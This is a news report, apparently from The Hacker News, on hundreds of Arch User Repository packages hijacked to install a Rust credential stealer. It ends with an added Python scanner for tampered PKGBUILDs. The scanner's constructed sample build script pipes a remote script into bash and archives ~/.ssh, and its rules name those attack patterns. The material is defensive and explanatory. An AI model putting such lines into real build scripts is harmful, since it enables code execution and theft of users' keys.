400+ Arch Linux AUR Packages Hijacked to Install Rust Credential Stealer
Attackers compromised more than 400 packages in the Arch User Repository (AUR) this week, modifying their build scripts to distribute a Rust-based credential stealer. The malware targets developer secrets and, if it gains root privileges, can deploy an eBPF rootkit for stealth. The AUR is a community-driven package repository for Arch Linux and operates independently of the official Arch Linux repositories.

The compromise was discovered on March 12, 2024, by security researchers who observed malicious code in the build scripts of numerous popular AUR packages. The attackers reportedly used compromised accounts to push the malicious updates. The stolen credentials could include API keys, SSH private keys, and other sensitive information stored by developers. The eBPF rootkit lets the malware evade standard security tools by manipulating kernel-level network and process information.

Arch Linux maintainers have begun identifying and removing the compromised packages and are urging users to review their installed AUR packages for signs of compromise. The incident highlights the security risks of community-maintained software repositories and the importance of rigorous vetting for user-submitted packages.
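The review the maintainers are asking for comes down to reading the build scripts (PKGBUILDs) of installed AUR packages and looking for steps that have no business in a build: fetching and executing remote content, decoding embedded payloads, or reaching into credential directories. The following is an added example, not code from the reporting, from Arch Linux or from any tool named on the page. It is a heuristic scanner with a small set of rules I chose myself; the PKGBUILD it scans is constructed for the demonstration and contains no indicator from the actual incident. A clean result means only that none of these patterns matched, not that the package is trustworthy.

```python
"""Heuristic review of a PKGBUILD for build-script tampering of the kind
described above.  Rules and sample input are constructed for this example."""
import re
from typing import Dict, List, Tuple

# Constructed sample (not a real AUR package): a normal-looking build() plus a
# package() step that pipes a remote script into a shell and reads ~/.ssh.
SAMPLE_PKGBUILD = r"""
pkgname=example-tool
pkgver=1.2.3
pkgrel=2
arch=('x86_64')
source=("https://example.invalid/example-tool-$pkgver.tar.gz")
sha256sums=('SKIP')

build() {
  cd "$srcdir/$pkgname-$pkgver"
  make
}

package() {
  cd "$srcdir/$pkgname-$pkgver"
  make DESTDIR="$pkgdir" install
  curl -s https://example.invalid/setup.sh | bash
  tar czf /tmp/.cache.tgz "$HOME/.ssh"
}
"""

# (compiled pattern, description).  Each hit deserves a human look; none is a verdict.
RULES: List[Tuple[re.Pattern, str]] = [
    (re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(ba|z)?sh\b"), "remote content piped into a shell"),
    (re.compile(r"base64\s+(-d|--decode)\b[^|\n]*\|\s*(ba|z)?sh\b"), "base64-decoded payload executed"),
    (re.compile(r"\beval\b"), "eval of dynamic content"),
    (re.compile(r"(\$HOME|~)/\.(ssh|gnupg|aws|config/gh)\b"), "reads a credential directory"),
    (re.compile(r"\bsystemctl\s+(enable|start)\b"), "enables a service from a build script"),
    (re.compile(r"\bsha256sums=\(['\"]SKIP['\"]\)"), "checksum verification disabled"),
]


def split_functions(text: str) -> Dict[str, str]:
    """Return {name: body} for bash-style `name() {` blocks, plus everything
    outside a function under the key '<top-level>'.  Plain brace counting;
    braces inside quotes are not special-cased, which suffices for typical
    PKGBUILDs."""
    funcs: Dict[str, str] = {}
    top: List[str] = []
    lines = text.splitlines()
    header = re.compile(r"^\s*(\w+)\s*\(\)\s*\{")
    i = 0
    while i < len(lines):
        m = header.match(lines[i])
        if not m:
            top.append(lines[i])
            i += 1
            continue
        name, depth, body = m.group(1), 0, []
        while i < len(lines):
            depth += lines[i].count("{") - lines[i].count("}")
            body.append(lines[i])
            i += 1
            if depth == 0:
                break
        funcs[name] = "\n".join(body)
    funcs["<top-level>"] = "\n".join(top)
    return funcs


def scan_pkgbuild(text: str) -> List[Dict[str, str]]:
    """Apply RULES to each function body and to the top level; return findings
    as {scope, why, match} dicts in the order they were encountered."""
    findings: List[Dict[str, str]] = []
    for scope, body in split_functions(text).items():
        for pattern, why in RULES:
            for m in pattern.finditer(body):
                findings.append({"scope": scope, "why": why, "match": m.group(0).strip()})
    return findings


if __name__ == "__main__":
    # On a real system you would feed this the PKGBUILD of every package that
    # `pacman -Qm` reports as foreign (i.e. not from the official repositories).
    for f in scan_pkgbuild(SAMPLE_PKGBUILD):
        print(f"[{f['scope']}] {f['why']}: {f['match']}")
```

Scoping findings to the function they appear in matters: a network fetch in `source=()` is normal and is checksum-verified by makepkg, whereas the same fetch inside `package()` bypasses that verification entirely, which is exactly the kind of modification the reporting describes.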
Original source — read the full reporting at the publisher:
Read on The Hacker News